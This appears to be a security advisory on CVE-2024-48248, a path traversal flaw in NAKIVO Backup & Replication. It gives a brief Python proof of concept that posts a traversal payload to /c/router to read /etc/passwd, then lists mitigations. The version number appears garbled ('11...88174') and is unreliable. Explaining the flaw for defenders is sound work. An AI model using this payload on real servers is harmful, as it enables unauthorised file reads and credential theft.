A critical vulnerability has been discovered in NAKIVO Backup & Replication versions prior to 11...88174, which allows an attacker to perform absolute path traversal for reading files via the getImageByPath function in the /c/router module. This could lead to remote code execution across an enterprise network as the PhysicalDiscovery component has cleartext credentials. This article will provide a detailed overview of the vulnerability, steps to reproduce the issue, and mitigation strategies to secure your environment.
Vulnerability Details
The vulnerability affects NAKIVO Backup & Replication versions prior to 11...88174. The issue resides in the getImageByPath function, which is a part of the /c/router module. The function does not properly sanitize user input, allowing an attacker to feed an absolute path to the function, leading to unauthorized file access and potentially remote code execution.
Exploit Details
The exploit can be triggered by sending a specially crafted HTTP request to the NAKIVO Backup & Replication server containing the absolute path of the target file. For example, the following Python script can be used to read the content of the "/etc/passwd" file:
import requests
target_url = "https://<target_ip>/c/router";
payload = {
"data": {
"invoker": "get",
"method": "getImageByPath",
"args": "/../../../../../../../../etc/passwd"
}
}
response = requests.post(target_url, json=payload)
print(response.content)
Replace <target_ip> with the IP address of the NAKIVO Backup & Replication server. Running this script will result in the server returning the contents of the "/etc/passwd" file.
Possible Impact
An attacker could exploit this vulnerability to read sensitive files on the server, such as configuration files containing cleartext credentials. This could lead to unauthorized access to resources across the enterprise network. In addition, remote code execution could be achieved if an attacker manages to read and modify specific files or upload malicious scripts to the server, further compromising the organization's security posture.
To mitigate the risks associated with CVE-2024-48248, it is recommended to
1. Update NAKIVO Backup & Replication to the latest version (11...88174 or later). The patch for this vulnerability can be downloaded from the official NAKIVO website: https://www.nakivo.com/resources/download/update/
2. Monitor network traffic for any suspicious activity related to the /c/router module, especially for requests attempting file access outside the intended directory tree. Configuring a Web Application Firewall (WAF) to block such requests can further minimize the risk.
3. Limit access to the NAKIVO Backup & Replication interface to authorized personnel and implement strong authentication mechanisms, such as multi-factor authentication (MFA).
4. Ensure that the operating system and other software components running on the NAKIVO Backup & Replication server are up-to-date and properly secured, including applying the latest security patches and following best practices for hardening.
Conclusion
The recent CVE-2024-48248 vulnerability in NAKIVO Backup & Replication highlights the importance of continuously monitoring and updating software applications to minimize the risk of security breaches. By promptly updating NAKIVO Backup & Replication and implementing the recommended mitigation strategies, organizations can effectively protect their environments from this and similar vulnerabilities.
Works Cited / Original References:
NAKIVO. (n.d.). NAKIVO Backup & Replication Update. https://www.nakivo.com/resources/download/update/
CVE. (n.d.). CVE-2024-48248 Detail. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48248
Timeline
Published on: 03/04/2025 08:15:33 UTC
Last modified on: 03/25/2025 18:48:31 UTC